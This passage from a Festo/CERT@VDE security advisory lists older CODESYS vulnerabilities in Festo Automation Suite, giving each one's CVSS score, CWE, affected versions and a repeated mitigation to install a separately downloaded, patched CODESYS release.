information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2019-13548 CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which could cause a stack overflow and create a denial-of-service condition or allow remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-18858 CODESYS 3 web server before 3.5.15.20, as distributed with CODESYS Control runtime systems, has a Buffer Overflow. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-19789 3S-Smart CODESYS SP Realtime NT before V2.3.7.28, CODESYS Runtime Toolkit 32 bit full before V2.4.7.54, and CODESYS PLCWinNT before V2.4.7.54 allow a NULL pointer dereference. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2019-5105 An exploitable memory corruption vulnerability exists in the Name Service Client functionality of 3S-Smart Software Solutions CODESYS GatewayService. A specially crafted packet can cause a large memcpy, resulting in an access violation and termination of the process. An attacker can send a packet to a device running the GatewayService.exe to trigger this vulnerability. All variants of the CODESYS V3 products in all versions prior V3.5.16.10 containing the CmpRouter or CmpRouterEmbedded component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PLCnext, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Edge Gateway V3, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Simulation Runtime (part of the CODESYS Development System). View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2019-9008 An issue was discovered in 3S-Smart CODESYS V3 through 3.5.12.30. A user with low privileges can take full control over the runtime. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2019-9009 An issue was discovered in 3S-Smart CODESYS before 3.5.15.0 . Crafted network packets cause the Control Runtime to crash. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-755 Improper Handling of Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2019-9010 An issue was discovered in 3S-Smart CODESYS V3 products. The CODESYS Gateway does not correctly verify the ownership of a communication channel. All variants of the following CODESYS V3 products in all versions prior to v3.5.14.20 that contain the CmpGateway component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control V3 Runtime System Toolkit, CODESYS Gateway V3, CODESYS V3 Development System. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-9011 In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), an attacker can identify valid usernames. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-668 Exposure of Resource to Wrong Sphere Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2019-9012 An issue was discovered in 3S-Smart CODESYS V3 products. A crafted communication request may cause uncontrolled memory allocations in the affected CODESYS products and may result in a denial-of-service condition. All variants of the following CODESYS V3 products in all versions prior to v3.5.14.20 that contain the CmpGateway component are affected, regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control V3 Runtime System Toolkit, CODESYS Gateway V3, CODESYS V3 Development System. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2019-9013 An issue was discovered in 3S-Smart CODESYS V3 products. The application may utilize non-TLS based encryption, which results in user credentials being insufficiently protected during transport. All variants of the following CODESYS V3 products in all versions containing the CmpUserMgr component are affected regardless of the CPU type or operating system: CODESYS Control for BeagleBone, CODESYS Control for emPC-A/iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (also part of the CODESYS Development System setup), CODESYS V3 Simulation Runtime (part of the CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-327 Use of a Broken or Risky Cryptographic Algorithm Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2020-10245 CODESYS V3 web server before 3.5.15.40, as used in CODESYS Control runtime systems, has a buffer overflow. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2020-12067 In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), a user's password may be changed by an attacker without knowledge of the current password. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-640 Weak Password Recovery Mechanism for Forgotten Password Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-12068 An issue was discovered in CODESYS Development System before 3.5.16.0. CODESYS WebVisu and CODESYS Remote TargetVisu are susceptible to privilege escalation. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly 